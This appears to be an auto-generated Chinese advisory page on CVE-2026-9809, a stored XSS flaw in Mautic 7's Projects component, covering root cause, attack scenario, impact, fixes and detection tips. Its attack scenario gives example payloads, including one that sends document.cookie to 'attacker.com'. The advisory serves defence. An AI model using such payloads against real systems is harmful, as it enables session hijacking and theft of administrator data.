CVE-2026-9809 - Mautic has Stored Cross-Site Scripting (XSS) in Projects Component

CVE-2026-9809是Mautic 7 Projects组件的高危存储型跨站脚本(Stored XSS)漏洞,影响7.0.0至7.1.1版本。攻击者可注入恶意项目名称,在管理员悬停标签时执行脚本,导致后台操作或数据泄露。升级至7.1.2即可修复,临时可限制项目权限缓解风险。

🔥 热门漏洞情报 · GitHub-Advisory · 2026-07-02

CVE-2026-9809 - Mautic has Stored Cross-Site Scripting (XSS) in Projects Component

High · CVSS 7.6 存储型跨站脚本(Stored XSS)
CVE-2026-9809
📊 跨来源整合NVD-LatestPoC-in-GitHub

📋 漏洞概述

Mautic 7 Projects组件存在存储型XSS漏洞,管理员悬停项目标签时触发恶意脚本,可导致后台操作或数据泄露。

📋 基础信息

受影响版本Mautic 7.0.0 <= version < 7.1.2(仅含Projects功能的7.x分支受影响,4.x/5.x/6.x不受影响)
漏洞类型存储型跨站脚本(Stored XSS)
CVSS7.6 · High
CVECVE-2026-9809

🔬 漏洞根因

Mautic 7 Projects组件在管理后台的详细视图(如活动、邮件、表单)中渲染项目标签和弹出框时,未对用户可控的项目名称进行充分的输出编码或HTML净化。攻击者可将恶意脚本作为项目名称注入,该名称经后端存储后未经过滤地嵌入前端页面,导致浏览器执行任意JavaScript。推测:项目名称输入验证过滤不严,且输出时未采用安全的上下文感知编码。

🎯 攻击场景

1. 前提:攻击者拥有Mautic 7中创建或编辑项目的权限(通常为低权限管理员或专门分配了项目权限的用户)。 2. 攻击者创建一个新项目,将项目名称设置为恶意XSS载荷,例如:<img src=x onerror=alert(document.cookie)> 或 <svg/onload=fetch('//attacker.com/steal?c='+document.cookie)>。 3. 将该恶意项目关联到某个实体(如广告系列、邮件或表单),或等待现有实体被关联到此项目。 4. 攻击者诱导具有更高管理权限的用户访问该实体的管理详情页。 5. 当管理员移动鼠标悬停在项目标签或弹窗上时,恶意脚本在管理员浏览器会话中自动执行,攻击者借此窃取会话Cookie、执行敏感操作或篡改系统配置。

💥 漏洞影响

成功利用该漏洞可在目标管理员的浏览器上下文中执行任意JavaScript代码,实现会话劫持、敏感数据窃取(如配置、用户数据)、以管理员身份执行操(如创建管理员账号、修改系统设置、投放恶意内容),从而完全破坏Mautic应用的机密性和完整性。

🛡️ 修复建议

1. 立即升级Mautic至7.1.2或更高版本,该版本已修复项目名称的渲染净化问题。 2. 在升级前,临时严格限制项目创建/编辑权限,仅授予完全可信的管理用户。 3. 在应用层增加输出编码与CSP(内容安全策略)缓解XSS,并审计现有项目名称中是否有可疑脚本内容。

📎 参考链接

🚨 威胁评估

📈 EPSS 利用概率低 (0.2%) (高于 5.9% 的漏洞)
🚨 CISA KEV未被已知利用
🔧 公开 PoC暂无公开 PoC

⚠️ 本文由漏洞情报系统自动生成,仅供安全研究与防御参考。生成时间: 2026-08-03 02:06 | 来源: GitHub-Advisory

🤖 常见问题解答(FAQ)

❓ 如何检测环境中是否存在该漏洞利用痕迹?

检查Mautic项目表中项目名称是否包含HTML标签或脚本代码(如<script>、<img onerror>、<svg onload>等)。同时审查管理员会话日志中是否有异常操作或请求,以及外发网络流量中是否有可疑的数据外传行为。

❓ 该漏洞影响哪些版本?是否需要同时修复4/5/6分支?

仅影响启用Projects功能的Mautic 7.x(7.0.0至7.1.1),7.1.2修复。4.x、5.x、6.x不包含Projects组件,不受此CVE影响,无需因此升级。

❓ 如果暂时无法升级,有哪些临时缓解措施?

限制项目创建和编辑权限至绝对信任的管理员,避免低权限用户操作项目;启用Web应用防火墙(WAF)规则拦截XSS载荷;在应用响应头添加Content-Security-Policy,如script-src 'self',以降低脚本执行风险。

[!] CONTACT_CHANNELS

如需商务合作、技术咨询或漏洞反馈,请通过以下离岸节点联系作者。

> PING_AUTHOR (@A1RedTeam)